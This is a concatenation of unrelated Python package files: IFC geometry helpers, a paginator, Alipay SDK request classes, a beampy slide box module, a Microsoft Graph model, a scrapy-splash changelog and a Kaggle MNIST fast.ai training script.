    return body, axis, placement
def create_ifc_trimmed_curve(curve: CurveRevolve, f: "ifile"):
    """Represent *curve* as an IfcTrimmedCurve over a circle about its rotation origin."""
    circle_placement = create_ifc_placement(f, origin=curve.rot_origin)
    circle = f.create_entity("IFCCIRCLE", circle_placement, curve.radius)
    # Each trim point carries both a parameter value (radians) and the cartesian
    # point; MasterRepresentation selects the parameter form as authoritative.
    trim_start = (f.create_entity("IFCPARAMETERVALUE", 0.0), ifc_p(f, curve.p1))
    trim_end = (f.create_entity("IFCPARAMETERVALUE", np.deg2rad(curve.angle)), ifc_p(f, curve.p2))
    return f.create_entity(
        "IFCTRIMMEDCURVE",
        BasisCurve=circle,
        Trim1=trim_start,
        Trim2=trim_end,
        SenseAgreement=True,
        MasterRepresentation="PARAMETER",
    )
def create_ifcrevolveareasolid(f, profile, ifcaxis2placement, origin, revolve_axis, revolve_angle):
    """Create an IfcRevolvedAreaSolid by revolving *profile* about *revolve_axis*.

    The axis is anchored at *origin*; *revolve_angle* is the sweep angle
    (radians, per the callers in this file which pass ``np.deg2rad(...)``).
    """
    ifcaxis1dir = f.create_entity("IfcAxis1Placement", ifc_p(f, origin), ifc_dir(f, revolve_axis))
    return f.create_entity("IfcRevolvedAreaSolid", profile, ifcaxis2placement, ifcaxis1dir, revolve_angle)
def create_polyline_beam(beam, f, profile):
    """Create swept geometry for a beam whose centreline is a CurvePoly.

    NOTE(review): returns ``(extrude_area_solid, loc_plac, ifc_polyline)``
    while the sibling beam builders return shape representations and the
    caller in this file unpacks ``axis, body, loc_plac`` — the shapes and
    ordering look inconsistent; confirm against the caller.
    NOTE(review): ``write_curve_poly`` is called without the file handle *f*
    although every other helper here threads *f* through — verify its signature.
    """
    ifc_polyline = write_curve_poly(beam.curve)
    extrude_dir = ifc_dir(f, (0.0, 0.0, 1.0))
    global_placement = create_ifc_placement(f)
    # Sweep the section profile along the polyline (fixed-reference swept solid).
    extrude_area_solid = f.create_entity(
        "IfcFixedReferenceSweptAreaSolid", profile, global_placement, ifc_polyline, 0.0, 1.0, extrude_dir
    )
    loc_plac = create_ifc_placement(f)
    return extrude_area_solid, loc_plac, ifc_polyline
def sweep_beam(beam, f, profile, global_placement, extrude_dir):
    """Sweep *profile* along the beam's poly-curve.

    Returns ``(solid, placement, polyline)`` — the swept solid entity, a fresh
    local placement and the IFC polyline used as the sweep directrix.
    """
    directrix = write_curve_poly(beam.curve)
    solid = f.create_entity(
        "IfcFixedReferenceSweptAreaSolid", profile, global_placement, directrix, 0.0, 1.0, extrude_dir
    )
    placement = create_ifc_placement(f)
    return solid, placement, directrix
|
PypiClean
|
/torweb-for-3-0.1.10.tar.gz/torweb-for-3-0.1.10/torweb/paginator.py
|
from math import ceil
class InvalidPage(Exception):
    """Base class for errors raised for an invalid page request."""
    pass


class PageNotAnInteger(InvalidPage):
    """Raised when the requested page number cannot be coerced to an int."""
    pass


class EmptyPage(InvalidPage):
    """Raised when the requested page is out of range or has no results."""
    pass
class Paginator(object):
    """Split *object_list* into pages of *per_page* items (Django-style).

    ``object_list`` may be any sliceable sequence or query-set-like object;
    when it exposes ``count()`` that is preferred over ``len()``. A caller may
    pre-supply ``total_count`` to skip counting entirely. ``orphans`` folds a
    short trailing page into the previous one.
    """

    def __init__(self, object_list, per_page, orphans=0, allow_empty_first_page=True,
                 expr=None, distinct=False, unit_name=u'条', total_count=None):
        self.object_list = object_list
        self.per_page = per_page
        self.orphans = orphans
        self.unit_name = unit_name
        self.allow_empty_first_page = allow_empty_first_page
        self._num_pages = None      # computed lazily by num_pages
        self._count = total_count   # may be pre-supplied; otherwise computed lazily
        self._count_expr = expr
        self._distinct = distinct

    def validate_number(self, number):
        """Validate and return the given 1-based page number as an int."""
        try:
            number = int(number)
        except (TypeError, ValueError):
            raise PageNotAnInteger('That page number is not an integer')
        if number < 1:
            raise EmptyPage('That page number is less than 1')
        # Page 1 is always permitted when empty first pages are allowed.
        if number > self.num_pages and not (number == 1 and self.allow_empty_first_page):
            raise EmptyPage('That page contains no results')
        return number

    def page(self, number):
        """Return a Page object for the given 1-based page number."""
        number = self.validate_number(number)
        start = (number - 1) * self.per_page
        stop = start + self.per_page
        # Fold trailing orphans into the final page.
        if stop + self.orphans >= self.count:
            stop = self.count
        return Page(self.object_list[start:stop], number, self)

    @property
    def count(self):
        """Total number of objects, across all pages (lazily computed)."""
        if self._count is None:
            try:
                if self._distinct:
                    self._count = self.object_list.count(expr=self._count_expr, distinct=self._distinct)
                else:
                    self._count = self.object_list.count()
            except (AttributeError, TypeError):
                # No count() method, or a count() that requires arguments
                # (as on plain lists) -- fall back to len().
                self._count = len(self.object_list)
        return self._count

    @property
    def num_pages(self):
        """Total number of pages (lazily computed)."""
        if self._num_pages is None:
            if self.count == 0 and not self.allow_empty_first_page:
                self._num_pages = 0
            else:
                hits = max(1, self.count - self.orphans)
                self._num_pages = int(ceil(hits / float(self.per_page)))
        return self._num_pages

    @property
    def page_range(self):
        """1-based range of page numbers, for iterating in templates."""
        return range(1, self.num_pages + 1)


QuerySetPaginator = Paginator  # For backwards-compatibility.
class Page(object):
    """One page of results produced by a Paginator."""

    def __init__(self, object_list, number, paginator):
        self.object_list = object_list
        self.number = number
        self.paginator = paginator

    def __repr__(self):
        return '<Page %s of %s>' % (self.number, self.paginator.num_pages)

    def __getitem__(self, index):
        # The object_list is converted to a list so that if it was a QuerySet
        # it won't be a database hit per __getitem__.
        return list(self.object_list)[index]

    # The following four methods are only necessary for Python <2.6
    # compatibility (this class could just extend 2.6's collections.Sequence).

    def __iter__(self):
        position = 0
        try:
            while True:
                yield self[position]
                position += 1
        except IndexError:
            return

    def __contains__(self, value):
        return any(item == value for item in self)

    def index(self, value):
        for position, item in enumerate(self):
            if item == value:
                return position
        raise ValueError

    def count(self, value):
        return sum(1 for item in self if item == value)

    # End of compatibility methods.

    def has_next(self):
        return self.number < self.paginator.num_pages

    def has_previous(self):
        return self.number > 1

    def has_other_pages(self):
        return self.has_previous() or self.has_next()

    def next_page_number(self):
        return self.number + 1

    def previous_page_number(self):
        return self.number - 1

    def start_index(self):
        """1-based index of the first object on this page, relative to the
        total number of objects in the paginator."""
        # Special case, return zero if no items.
        if self.paginator.count == 0:
            return 0
        return self.paginator.per_page * (self.number - 1) + 1

    def end_index(self):
        """1-based index of the last object on this page, relative to the
        total number of objects found (hits)."""
        # Special case for the last page because there can be orphans.
        if self.number == self.paginator.num_pages:
            return self.paginator.count
        return self.number * self.paginator.per_page
|
PypiClean
|
/alipay-python-3.3.17.tar.gz/alipay-python-3.3.17/alipay/aop/api/request/AlipayEbppJfexportBillCreateRequest.py
|
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayEbppJfexportBillCreateModel import AlipayEbppJfexportBillCreateModel
class AlipayEbppJfexportBillCreateRequest(object):
    """Request wrapper for the ``alipay.ebpp.jfexport.bill.create`` gateway call.

    Collects the business payload plus common gateway parameters and renders
    them into the flat parameter dict expected by the Alipay OpenAPI gateway.
    """

    def __init__(self, biz_model=None):
        self._biz_model = biz_model
        self._biz_content = None
        self._version = "1.0"
        self._terminal_type = None
        self._terminal_info = None
        self._prod_code = None
        self._notify_url = None
        self._return_url = None
        self._udf_params = None
        self._need_encrypt = False

    # -- simple pass-through accessors --------------------------------------

    def _passthrough(attr):  # descriptor factory evaluated at class-body time
        def _get(self):
            return getattr(self, attr)

        def _set(self, value):
            setattr(self, attr, value)

        return property(_get, _set)

    biz_model = _passthrough("_biz_model")
    version = _passthrough("_version")
    terminal_type = _passthrough("_terminal_type")
    terminal_info = _passthrough("_terminal_info")
    prod_code = _passthrough("_prod_code")
    notify_url = _passthrough("_notify_url")
    return_url = _passthrough("_return_url")
    need_encrypt = _passthrough("_need_encrypt")
    del _passthrough

    # -- accessors with coercion/validation ----------------------------------

    @property
    def biz_content(self):
        return self._biz_content

    @biz_content.setter
    def biz_content(self, value):
        # Accept either a ready model instance or a plain dict to convert.
        if isinstance(value, AlipayEbppJfexportBillCreateModel):
            self._biz_content = value
        else:
            self._biz_content = AlipayEbppJfexportBillCreateModel.from_alipay_dict(value)

    @property
    def udf_params(self):
        return self._udf_params

    @udf_params.setter
    def udf_params(self, value):
        # Non-dict values are silently ignored, matching the SDK convention.
        if isinstance(value, dict):
            self._udf_params = value

    def add_other_text_param(self, key, value):
        """Attach an extra free-form text parameter to the request."""
        if not self.udf_params:
            self.udf_params = dict()
        self.udf_params[key] = value

    def get_params(self):
        """Render the request into the flat dict sent to the gateway."""
        params = dict()
        params[P_METHOD] = 'alipay.ebpp.jfexport.bill.create'
        params[P_VERSION] = self.version
        if self.biz_model:
            params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
        if self.biz_content:
            if hasattr(self.biz_content, 'to_alipay_dict'):
                params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['biz_content'] = self.biz_content
        # Optional scalar fields are emitted only when truthy, in this order.
        for name in ('terminal_type', 'terminal_info', 'prod_code', 'notify_url', 'return_url'):
            value = getattr(self, name)
            if value:
                params[name] = value
        if self.udf_params:
            params.update(self.udf_params)
        return params

    def get_multipart_params(self):
        """No file attachments for this API -- always an empty dict."""
        return dict()
|
PypiClean
|
/alipay_sdk_python-3.6.740-py3-none-any.whl/alipay/aop/api/request/KoubeiSalesKbassetStuffProduceorderBatchqueryRequest.py
|
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.KoubeiSalesKbassetStuffProduceorderBatchqueryModel import KoubeiSalesKbassetStuffProduceorderBatchqueryModel
class KoubeiSalesKbassetStuffProduceorderBatchqueryRequest(object):
    """Request wrapper for the ``koubei.sales.kbasset.stuff.produceorder.batchquery``
    gateway call.

    Collects the business payload plus common gateway parameters and renders
    them into the flat parameter dict expected by the Alipay OpenAPI gateway.
    """

    def __init__(self, biz_model=None):
        self._biz_model = biz_model
        self._biz_content = None
        self._version = "1.0"
        self._terminal_type = None
        self._terminal_info = None
        self._prod_code = None
        self._notify_url = None
        self._return_url = None
        self._udf_params = None
        self._need_encrypt = False

    # -- simple pass-through accessors --------------------------------------

    def _passthrough(attr):  # descriptor factory evaluated at class-body time
        def _get(self):
            return getattr(self, attr)

        def _set(self, value):
            setattr(self, attr, value)

        return property(_get, _set)

    biz_model = _passthrough("_biz_model")
    version = _passthrough("_version")
    terminal_type = _passthrough("_terminal_type")
    terminal_info = _passthrough("_terminal_info")
    prod_code = _passthrough("_prod_code")
    notify_url = _passthrough("_notify_url")
    return_url = _passthrough("_return_url")
    need_encrypt = _passthrough("_need_encrypt")
    del _passthrough

    # -- accessors with coercion/validation ----------------------------------

    @property
    def biz_content(self):
        return self._biz_content

    @biz_content.setter
    def biz_content(self, value):
        # Accept either a ready model instance or a plain dict to convert.
        if isinstance(value, KoubeiSalesKbassetStuffProduceorderBatchqueryModel):
            self._biz_content = value
        else:
            self._biz_content = KoubeiSalesKbassetStuffProduceorderBatchqueryModel.from_alipay_dict(value)

    @property
    def udf_params(self):
        return self._udf_params

    @udf_params.setter
    def udf_params(self, value):
        # Non-dict values are silently ignored, matching the SDK convention.
        if isinstance(value, dict):
            self._udf_params = value

    def add_other_text_param(self, key, value):
        """Attach an extra free-form text parameter to the request."""
        if not self.udf_params:
            self.udf_params = dict()
        self.udf_params[key] = value

    def get_params(self):
        """Render the request into the flat dict sent to the gateway."""
        params = dict()
        params[P_METHOD] = 'koubei.sales.kbasset.stuff.produceorder.batchquery'
        params[P_VERSION] = self.version
        if self.biz_model:
            params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
        if self.biz_content:
            if hasattr(self.biz_content, 'to_alipay_dict'):
                params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['biz_content'] = self.biz_content
        # Optional scalar fields are emitted only when truthy, in this order.
        for name in ('terminal_type', 'terminal_info', 'prod_code', 'notify_url', 'return_url'):
            value = getattr(self, name)
            if value:
                params[name] = value
        if self.udf_params:
            params.update(self.udf_params)
        return params

    def get_multipart_params(self):
        """No file attachments for this API -- always an empty dict."""
        return dict()
|
PypiClean
|
/beampy_slideshow-0.5.5.post3-py3-none-any.whl/beampy/modules/box.py
|
from beampy.document import document
from beampy.functions import set_curentslide, set_lastslide
from beampy.modules.core import group
from beampy.modules.text import text
from beampy.modules.svg import rectangle
from beampy.geometry import center
import logging
class box(group):
    """
    Draw a box around a group.

    Parameters
    ----------

    title : str or None, optional
        The title of the box (the default value is None, which implies
        no title).

    x : int or float or {'center', 'auto'} or str, optional
        Horizontal position for the group (the default is 'center'). See
        positioning system of Beampy.

    y : int or float or {'center', 'auto'} or str, optional
        Vertical position for the group (the default is 'auto'). See
        positioning system of Beampy.

    width : int or float or None, optional
        Width of the group (the default is None, which implies that the width
        is computed to fit the group contents width).

    height : int or float or None, optional
        Height of the group (the default is None). When height is None the
        height is computed to fit the group contents height.

    parentid : str or None, optional
        Beampy id of the parent group (the default is None). This parentid is
        given automatically by Beampy render.

    rounded : int, optional
        The number of pixel for rounded borders (the default value is
        10).

    linewidth : int, optional
        The linewidth of the border in pt (the default value is 1).

    color : svg color name as string, optional
        The color of the contour line of the box (the default value is
        'red').

    head_height : int or None, optional
        The height in pixel of the background under the title (the
        default is None, which implies that height is computed from
        title height + 10px of margins). You need to adjust this value
        for multi-lines titles.

    shadow : boolean, optional
        Draw a shadow under the box (the default value is False, which
        means no shadow).

    background_color : svg color name as string, optional
        The color of the background of the box (the default value is
        'white').

    title_color : svg color name as string, optional
        The color of the title (the default value is 'white').

    title_align : {'left','right','center'}, optional
        The horizontal alignment of the title (the default value is
        'left').

    title_xoffset : int, optional
        The horizontal offset in pixel from the box border of the
        title (the default value is 10).

    title_size : int, optional
        The size of the box title font (the default theme set this
        value the size of main text).

    title_background_color: svg color name as string, optional
        The color of the background below the title (The default theme
        set this to the same color as the contour line).

    title_height_margin: int, optional
        Set the space between the bottom and the top of the title (the default theme sets this value to 10)

    auto_height_margin : int, optional
        The vertical margin in pixel (top and bottom) to use when box height is not specified
        (the default theme sets this value to 15).
    """

    def __init__(self, title=None, x='center', y='auto', width=None,
                 height=None, parentid=None, **kwargs):

        self.title = title
        # Fill in unspecified options (color, rounded, head_height, ...) from the theme.
        self.check_args_from_theme(kwargs)

        super(box, self).__init__(x=x,
                                  y=y,
                                  width=width,
                                  height=height,
                                  parentid=parentid,
                                  opengroup=False)

        # Build the title if it's not None
        self.bp_title = None  # to store beampy text object for the title
        if self.title is not None:
            # Title should not be in group
            self.build_title()

        # Vertical offset applied to the boxed contents (the title band height).
        # NOTE(review): when title is None, head_height comes straight from the
        # theme -- confirm the theme default is usable here.
        self.yoffset = self.head_height

    def build_title(self):
        """Create the beampy text element for the title and derive head_height."""
        self.title_xpos = self.title_xoffset
        self.title_ypos = self.title_height_margin/2

        self.bp_title = text(self.title, x=self.title_xpos,
                             y=self.title_ypos, color=self.title_color,
                             width=self.width-20, size=self.title_size)

        # Add y offset to the group (the height taken by the title)
        if self.head_height is None:
            self.head_height = (self.bp_title.height + self.title_height_margin).value

        # print(self.height, self.width)
        # self.remove_element_in_group(self.bp_title.id)
        # self.bp_title = None

    def build_background(self):
        """Create the box background rectangle, optional shadow and title band."""
        if self.shadow:
            self.svg_shadow = '#drop-shadow'
        else:
            self.svg_shadow = None

        # Main rounded rectangle centred on the group.
        self.main_svg = rectangle(width=self.width,
                                  height=self.height,
                                  rx=self.rounded,
                                  ry=self.rounded,
                                  edgecolor=self.color,
                                  linewidth=self.linewidth,
                                  color=self.background_color,
                                  svgfilter=self.svg_shadow,
                                  x=self.center+center(0),
                                  y=self.center+center(0))

        if self.svg_shadow is not None:
            # SVG filter definition referenced by the rectangle's svgfilter.
            self.main_svg.add_svgdef('''
            <filter id="drop-shadow"> <feGaussianBlur in="SourceAlpha"
            stdDeviation="3"/> <feOffset dx="4" dy="4" result="offsetblur"/>
            <feMerge> <feMergeNode/> <feMergeNode in="SourceGraphic"/> </feMerge>
            </filter>
            ''')

        if self.bp_title is not None:
            # Title band: a filled rectangle clipped to the rounded box outline.
            clipid = "#boxborder_{id}".format(id=self.id)
            self.title_svg = rectangle(width=self.width,
                                       height=self.head_height,
                                       color=self.color,
                                       edgecolor=self.color,
                                       linewidth=self.linewidth,
                                       svgclip=clipid,
                                       x="-%ipx"%(self.linewidth/2),
                                       y="-%ipx"%(self.linewidth/2))

            self.title_svg.rounded = self.rounded
            self.title_svg.add_svgdef('''
            <clipPath id="boxborder_%s">
            <rect width="{width}" height="{clipheight}"
            rx="{rounded}" ry="{rounded}" stroke="{color}"
            stroke-width="{linewidth}"/>
            </clipPath>
            ''' % self.id, ['width', 'clipheight', 'rounded',
                            'color', 'linewidth'])

            # Added to clip the title square
            self.title_svg.clipheight = self.head_height * 2

    def pre_render(self):
        """Size the group, inject background/title SVG and place the title.

        Called at render time; mutates the slide contents stored on the
        global beampy ``document``.
        """
        set_curentslide(self.slide_id)

        if self.init_height is None:
            # Height is automatic: render children first so their sizes are known.
            for eid in self.elementsid:
                elem = document._slides[self.slide_id].contents[eid]
                if elem.height.value is None:
                    elem.height.run_render()
                if elem.width.value is None:
                    elem.width.run_render()

            self.compute_group_size()
            self.update_size(self.width, self.height+self.yoffset +
                             2*self.auto_height_margin)

            # Report offset on auto placed elements
            for eid in self.elementsid:
                document._slides[self.slide_id].contents[eid].positionner.y['final'] += self.yoffset + self.auto_height_margin
        else:
            # The case of the height is given and elements have a
            # fixed shift, weed need to update the shift with the
            # title yoffset TODO: This should be included in the group
            # class !!!
            for eid in self.elementsid:
                elemp = document._slides[self.slide_id].contents[eid].positionner
                if elemp.y['align'] not in ['auto', 'center'] and elemp.y['reference'] != 'relative':
                    document._slides[self.slide_id].contents[eid].positionner.y['shift'] += self.yoffset

        # Create the backgroud objects
        with self:
            self.build_background()

        # Propagate the layer inside the group
        # (as we added element in render time)
        self.propagate_layers()

        # Manage position of new objects
        self.main_svg.first()

        # Replace the title of the box
        if self.bp_title is not None:
            self.title_svg.above(self.main_svg)
            # Set the correct layers for the title
            logging.debug('set layer to box title to %s ' % str(self.layers))
            self.bp_title.layers = self.layers

            title_xpos = self.left + self.title_xoffset
            if self.title_align == 'center':
                title_xpos = self.left + (self.title_svg.width-self.bp_title.width)/2

            if self.title_align == 'right':
                title_xpos = self.right - (self.bp_title.width + self.title_xpos)

            self.bp_title.positionner.update_y(self.top + self.title_ypos)
            self.bp_title.positionner.update_x(title_xpos)

        set_lastslide()
|
PypiClean
|
/msgraph_beta_sdk-1.0.0a9-py3-none-any.whl/msgraph/generated/models/search/acronym_collection_response.py
|
from __future__ import annotations
from kiota_abstractions.serialization import Parsable, ParseNode, SerializationWriter
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from . import acronym
from .. import base_collection_pagination_count_response
from .. import base_collection_pagination_count_response
class AcronymCollectionResponse(base_collection_pagination_count_response.BaseCollectionPaginationCountResponse):
    """Paged collection of search acronyms returned by the Graph API."""

    def __init__(self,) -> None:
        """
        Instantiates a new AcronymCollectionResponse and sets the default values.
        """
        super().__init__()
        # Backing field for the acronyms contained in this response page.
        self._value: Optional[List[acronym.Acronym]] = None

    @staticmethod
    def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> AcronymCollectionResponse:
        """
        Creates a new instance of the appropriate class based on discriminator value
        Args:
            parseNode: The parse node to use to read the discriminator value and create the object
        Returns: AcronymCollectionResponse
        """
        if parse_node is None:
            raise Exception("parse_node cannot be undefined")
        return AcronymCollectionResponse()

    def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:
        """
        The deserialization information for the current model
        Returns: Dict[str, Callable[[ParseNode], None]]
        """
        from . import acronym
        from .. import base_collection_pagination_count_response

        deserializers: Dict[str, Callable[[Any], None]] = {
            "value": lambda n: setattr(self, 'value', n.get_collection_of_object_values(acronym.Acronym)),
        }
        # Merge in the fields handled by the base pagination response.
        deserializers.update(super().get_field_deserializers())
        return deserializers

    def serialize(self, writer: SerializationWriter) -> None:
        """
        Serializes information the current object
        Args:
            writer: Serialization writer to use to serialize this model
        """
        if writer is None:
            raise Exception("writer cannot be undefined")
        super().serialize(writer)
        writer.write_collection_of_object_values("value", self.value)

    @property
    def value(self,) -> Optional[List[acronym.Acronym]]:
        """The acronyms in this response page (None until deserialized)."""
        return self._value

    @value.setter
    def value(self, value: Optional[List[acronym.Acronym]] = None) -> None:
        """Sets the acronyms for this response page."""
        self._value = value
|
PypiClean
|
/scrapy-splash-0.9.0.tar.gz/scrapy-splash-0.9.0/CHANGES.rst
|
Changes
=======
0.9.0 (2023-02-03)
------------------
* Removed official support for Python 2.7, 3.4, 3.5 and 3.6, and added official
support for Python 3.9, 3.10 and 3.11.
* Deprecated ``SplashJsonResponse.body_as_unicode()``, to be replaced by
``SplashJsonResponse.text``.
* Removed calls to obsolete ``to_native_str``, removed in Scrapy 2.8.
0.8.0 (2021-10-05)
------------------
* **Security bug fix:**
If you use HttpAuthMiddleware_ (i.e. the ``http_user`` and ``http_pass``
spider attributes) for Splash authentication, any non-Splash request will
expose your credentials to the request target. This includes ``robots.txt``
requests sent by Scrapy when the ``ROBOTSTXT_OBEY`` setting is set to
``True``.
Use the new ``SPLASH_USER`` and ``SPLASH_PASS`` settings instead to set
your Splash authentication credentials safely.
.. _HttpAuthMiddleware: http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth
* Responses now expose the HTTP status code and headers from Splash as
``response.splash_response_status`` and
``response.splash_response_headers`` (#158)
* The ``meta`` argument passed to the ``scrapy_splash.request.SplashRequest``
constructor is no longer modified (#164)
* Website responses with 400 or 498 as HTTP status code are no longer
handled as the equivalent Splash responses (#158)
* Cookies are no longer sent to Splash itself (#156)
* ``scrapy_splash.utils.dict_hash`` now also works with ``obj=None``
(``225793b``)
* Our test suite now includes integration tests (#156) and tests can be run
in parallel (``6fb8c41``)
* There’s a new ‘Getting help’ section in the ``README.rst`` file (#161,
#162), the documentation about ``SPLASH_SLOT_POLICY`` has been improved
  (#157) and a typo has been fixed (#121)
* Made some internal improvements (``ee5000d``, ``25de545``, ``2aaa79d``)
0.7.2 (2017-03-30)
------------------
* fixed issue with response type detection.
0.7.1 (2016-12-20)
------------------
* Scrapy 1.0.x support is back;
* README updates.
0.7 (2016-05-16)
----------------
* ``SPLASH_COOKIES_DEBUG`` setting allows to log cookies
sent and received to/from Splash in ``cookies`` request/response fields.
It is similar to Scrapy's builtin ``COOKIES_DEBUG``, but works for
Splash requests;
* README cleanup.
0.6.1 (2016-04-29)
------------------
* Warning about HTTP methods is no longer logged for non-Splash requests.
0.6 (2016-04-20)
----------------
* ``SplashAwareDupeFilter`` and ``splash_request_fingerprint`` are improved:
they now canonicalize URLs and take URL fragments in account;
* ``cache_args`` value fingerprints are now calculated faster.
0.5 (2016-04-18)
----------------
* ``cache_args`` SplashRequest argument and
``request.meta['splash']['cache_args']`` key allow to save network traffic
and disk storage by not storing duplicate Splash arguments in disk request
queues and not sending them to Splash multiple times. This feature requires
Splash 2.1+.
To upgrade from v0.4 enable ``SplashDeduplicateArgsMiddleware`` in settings.py::
SPIDER_MIDDLEWARES = {
'scrapy_splash.SplashDeduplicateArgsMiddleware': 100,
}
0.4 (2016-04-14)
----------------
* SplashFormRequest class is added; it is a variant of FormRequest which uses
Splash;
* Splash parameters are no longer stored in request.meta twice; this change
should decrease disk queues data size;
* SplashMiddleware now increases request priority when rescheduling the request;
this should decrease disk queue data size and help with stale cookie
problems.
0.3 (2016-04-11)
----------------
Package is renamed from ``scrapyjs`` to ``scrapy-splash``.
The easiest way to upgrade is to replace ``scrapyjs`` imports with
``scrapy_splash`` and update ``settings.py`` with new defaults
(check the README).
There are many new helpers to handle JavaScript rendering transparently;
the recommended way is now to use ``scrapy_splash.SplashRequest`` instead
of ``request.meta['splash']``. Please make sure to read the README if
you're upgrading from scrapyjs - you may be able to drop some code from your
project, especially if you want to access response html, handle cookies
and headers.
* new SplashRequest class; it can be used as a replacement for scrapy.Request
to provide a better integration with Splash;
* added support for POST requests;
* SplashResponse, SplashTextResponse and SplashJsonResponse allow to
handle Splash responses transparently, taking care of response.url,
response.body, response.headers and response.status. SplashJsonResponse
allows to access decoded response JSON data as ``response.data``.
* cookie handling improvements: it is possible to handle Scrapy and Splash
cookies transparently; current cookiejar is exposed as response.cookiejar;
* headers are passed to Splash by default;
* URLs with fragments are handled automatically when using SplashRequest;
* logging is improved: ``SplashRequest.__repr__`` shows both requested URL
and Splash URL;
* in case of Splash HTTP 400 errors the response is logged by default;
* an issue with dupefilters is fixed: previously the order of keys in
JSON request body could vary, making requests appear as non-duplicates;
* it is now possible to pass custom headers to Splash server itself;
* test coverage reports are enabled.
0.2 (2016-03-26)
----------------
* Scrapy 1.0 and 1.1 support;
* Python 3 support;
* documentation improvements;
* project is moved to https://github.com/scrapy-plugins/scrapy-splash.
0.1.1 (2015-03-16)
------------------
Fixed fingerprint calculation for non-string meta values.
0.1 (2015-02-28)
----------------
Initial release
|
PypiClean
|
/kaggle_runner-0.2.1-py3-none-any.whl/hub/beginners-guide-to-mnist-with-fast-ai.py
|
import warnings
warnings.simplefilter('ignore')
from fastai import *
from fastai.vision import *
from fastai.vision import get_transforms
import os
from pathlib import Path
import pandas as pd
# Kaggle digit-recognizer layout: train.csv / test.csv hold flattened 28x28 images.
INPUT = Path("../input/digit-recognizer")
os.listdir(INPUT)
train_df = pd.read_csv(INPUT/"train.csv")
test_df = pd.read_csv(INPUT/"test.csv")
# Image folders consumed by fast.ai's ImageDataBunch.from_folder:
# one sub-folder per digit class for training, a flat folder for the test set.
TRAIN = Path("../train")
TEST = Path("../test")
for index in range(10):
    try:
        os.makedirs(TRAIN/str(index))
    except:
        # Folder already exists from a previous run -- ignore.
        pass
sorted(os.listdir(TRAIN))
try:
    os.makedirs(TEST)
except:
    pass
from PIL import Image
def saveDigit(digit, filepath, size=28):
    """Save a flattened grayscale digit as an image file.

    Parameters
    ----------
    digit : array-like
        Flattened pixel values of length ``size * size`` (0-255).
    filepath : str or Path
        Destination path; the image format is inferred from the extension.
    size : int, optional
        Edge length of the square image (default 28, the MNIST size).
        Previously hard-coded; parameterized for reuse with other datasets.
    """
    pixels = np.asarray(digit, dtype=np.uint8).reshape(size, size)
    Image.fromarray(pixels).save(filepath)
# Write every training digit into its class sub-folder (<label>/<row>.jpg).
for index, row in train_df.iterrows():
    label,digit = row[0], row[1:]  # first column is the label, the rest are pixels
    folder = TRAIN/str(label)
    filename = f"{index}.jpg"
    filepath = folder/filename
    digit = digit.values
    saveDigit(digit, filepath)
# Test rows have no label column; write them flat into TEST.
for index, digit in test_df.iterrows():
    folder = TEST
    filename = f"{index}.jpg"
    filepath = folder/filename
    digit = digit.values
    saveDigit(digit, filepath)
import matplotlib.pyplot as plt
def displayTrainingData():
    """Show a 10x5 grid with five random training samples per digit class.

    One grid row per digit class 0-9. (The original loop started at 1, so
    class 0 was never shown and the first subplot row stayed empty.)
    """
    fig = plt.figure(figsize=(5, 10))
    for rowIndex in range(10):
        subdirectory = str(rowIndex)
        path = TRAIN/subdirectory
        images = os.listdir(path)
        for sampleIndex in range(1, 6):
            # Pick a random sample of this class for each of the five columns.
            randomNumber = random.randint(0, len(images)-1)
            image = Image.open(path/images[randomNumber])
            # Subplot indices are 1-based: row r (0..9) fills cells 5r+1 .. 5r+5.
            ax = fig.add_subplot(10, 5, 5*rowIndex + sampleIndex)
            ax.axis("off")
            plt.imshow(image, cmap='gray')
    plt.show()
def displayTestingData():
    """Show a 10x5 grid of 50 randomly chosen test images."""
    figure = plt.figure(figsize=(5, 10))
    filenames = os.listdir(TEST)
    for cell in range(1, 51):
        choice = random.randint(0, len(filenames) - 1)
        sample = Image.open(TEST/filenames[choice])
        axes = figure.add_subplot(10, 5, cell)
        axes.axis("off")
        plt.imshow(sample, cmap='gray')
    plt.show()
# Preview the freshly exported image folders.
print('samples of training data')
displayTrainingData()
print('samples of testing data')
displayTestingData()
# Load one test image as a numpy array for inspection.
image_path = TEST/os.listdir(TEST)[9]
image = Image.open(image_path)
image_array = np.asarray(image)
# (Disabled) per-pixel value annotation plot of the image above.
#fig, ax = plt.subplots(figsize=(15, 15))
#img = ax.imshow(image_array, cmap='gray')
#for x in range(28):
#    for y in range(28):
#        value = round(image_array[y][x]/255.0, 2)
#        color = 'black' if value > 0.5 else 'white'
#        ax.annotate(s=value, xy=(x, y), ha='center', va='center', color=color)
#
#plt.axis('off')
#plt.show()
# Build the DataBunch: no horizontal flips (digits are orientation
# sensitive), 20% validation split, 28x28 images, batch size 16.
tfms = get_transforms(do_flip=False)
data = ImageDataBunch.from_folder(
    path=str(TRAIN),
    test=str(TEST),
    valid_pct=0.2,
    bs=16,
    size=28,
    #num_workers = 0,
    ds_tfms=tfms
)
# Normalize with the MNIST statistics shipped with fast.ai.
print(mnist_stats)
data.normalize(mnist_stats)
print(data.classes)
# Baseline: transfer learning from a pretrained ResNet-18.
learn = cnn_learner(data, base_arch=models.resnet18, metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
learn.fit_one_cycle(cyc_len=5)
# Inspect results: highest-loss samples and the confusion matrix.
interp = ClassificationInterpretation.from_learner(learn)
interp.plot_top_losses(9, figsize=(7, 7))
interp.plot_confusion_matrix()
import platform; platform.system()
